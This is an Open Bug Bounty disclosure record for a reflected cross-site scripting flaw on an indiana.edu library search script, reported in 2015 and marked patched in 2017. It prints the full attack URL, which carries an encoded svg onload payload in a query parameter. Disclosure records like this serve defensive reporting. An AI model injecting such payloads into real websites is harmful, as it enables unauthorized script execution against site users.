indiana.edu XSS vulnerability

2015-10-16T11:18:00
ID OBB:92538
Type openbugbounty
Reporter MLT
Modified 2017-11-23T08:42:00

Description

Vulnerable URL:
http://www.indiana.edu/~librcsd/nt/db.cgi?db=nt&do;=search_results&LibCode;=%27%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3EB-&HomeL;=&Language;=ara&Format;=&CatDate;=&let;=&col;=Call&mh;=25&sb;=Call&submit;=Search
Details:

Description| Value
---|---
Patched:| Yes, at 23.11.2017
Latest check for patch:| 23.11.2017 08:42 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 8004
Google Pagerank| 7
VIP website status:| Yes
Check indiana.edu SSL connection:| (Grade: B-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 16 October, 2015 11:18 GMT
Vulnerability existence verified and confirmed| 16 October, 2015 11:20 GMT
Vulnerability patched by the website owner| 23 November, 2017 08:42 GMT